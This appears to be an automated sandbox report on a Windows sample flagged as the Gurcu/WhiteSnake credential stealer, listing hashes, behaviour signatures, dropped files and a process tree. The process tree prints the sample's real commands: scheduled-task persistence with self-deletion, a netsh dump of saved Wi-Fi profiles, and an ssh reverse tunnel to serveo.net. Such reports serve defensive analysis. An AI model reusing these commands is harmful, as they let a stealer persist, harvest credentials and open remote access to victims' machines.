Analysis

  • max time kernel
    154s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230831-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-09-2023 13:58

General

  • Target

    6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

  • Size

    53.4MB

  • MD5

    a43b860d290321de53ed6deb5cae95af

  • SHA1

    62cc70d91f7e39fc93b9b0f106f78a90cfc54047

  • SHA256

    6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538

  • SHA512

    535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

  • SSDEEP

    6144:wGWM/t/a2zDGVPJXvnzZjDJHb571Kjn1929XDccH19bqjWVHQDcXeUa:cmRatpvnzZjDv7oj19yTuj+H9XRa

Malware Config

Signatures

  • Detect Gurcu Stealer V3 payload 3 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k netsvcs -p
    1⤵
    • Drops file in System32 directory
    • Checks processor information in registry
    • Enumerates system info in registry
    PID:5112
  • C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
    "C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1416
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4944
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:1972
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:4860
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe" /rl HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:1288
        • C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
          "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • outlook_office_path
          • outlook_win_path
          PID:2348
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3044
            • C:\Windows\system32\chcp.com
              chcp 65001
              5⤵
                PID:2156
              • C:\Windows\system32\netsh.exe
                netsh wlan show profiles
                5⤵
                  PID:624
                • C:\Windows\system32\findstr.exe
                  findstr /R /C:"[ ]:[ ]"
                  5⤵
                    PID:2728
                • C:\Windows\SYSTEM32\cmd.exe
                  "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:548
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    5⤵
                      PID:5068
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show networks mode=bssid
                      5⤵
                        PID:1176
                      • C:\Windows\system32\findstr.exe
                        findstr "SSID BSSID Signal"
                        5⤵
                          PID:2996
                      • C:\Windows\System32\OpenSSH\ssh.exe
                        "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:8664 serveo.net
                        4⤵
                          PID:4424

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe.log

                    Filesize

                    847B

                    MD5

                    3308a84a40841fab7dfec198b3c31af7

                    SHA1

                    4e7ab6336c0538be5dd7da529c0265b3b6523083

                    SHA256

                    169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e

                    SHA512

                    97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198

                  • C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

                    Filesize

                    53.4MB

                    MD5

                    a43b860d290321de53ed6deb5cae95af

                    SHA1

                    62cc70d91f7e39fc93b9b0f106f78a90cfc54047

                    SHA256

                    6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538

                    SHA512

                    535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

                  • C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

                    Filesize

                    53.4MB

                    MD5

                    a43b860d290321de53ed6deb5cae95af

                    SHA1

                    62cc70d91f7e39fc93b9b0f106f78a90cfc54047

                    SHA256

                    6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538

                    SHA512

                    535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

                  • memory/1416-0-0x000001E3212B0000-0x000001E321312000-memory.dmp

                    Filesize

                    392KB

                  • memory/1416-2-0x00007FFBA4F60000-0x00007FFBA5A21000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/1416-3-0x000001E3216E0000-0x000001E3216F0000-memory.dmp

                    Filesize

                    64KB

                  • memory/1416-7-0x00007FFBA4F60000-0x00007FFBA5A21000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/2348-18-0x00007FFBA4E30000-0x00007FFBA58F1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/2348-19-0x0000022C76A20000-0x0000022C76A30000-memory.dmp

                    Filesize

                    64KB

                  • memory/2348-22-0x00007FFBA4E30000-0x00007FFBA58F1000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/2348-23-0x0000022C76A20000-0x0000022C76A30000-memory.dmp

                    Filesize

                    64KB

                  • memory/2348-24-0x0000022C76C70000-0x0000022C76E19000-memory.dmp

                    Filesize

                    1.7MB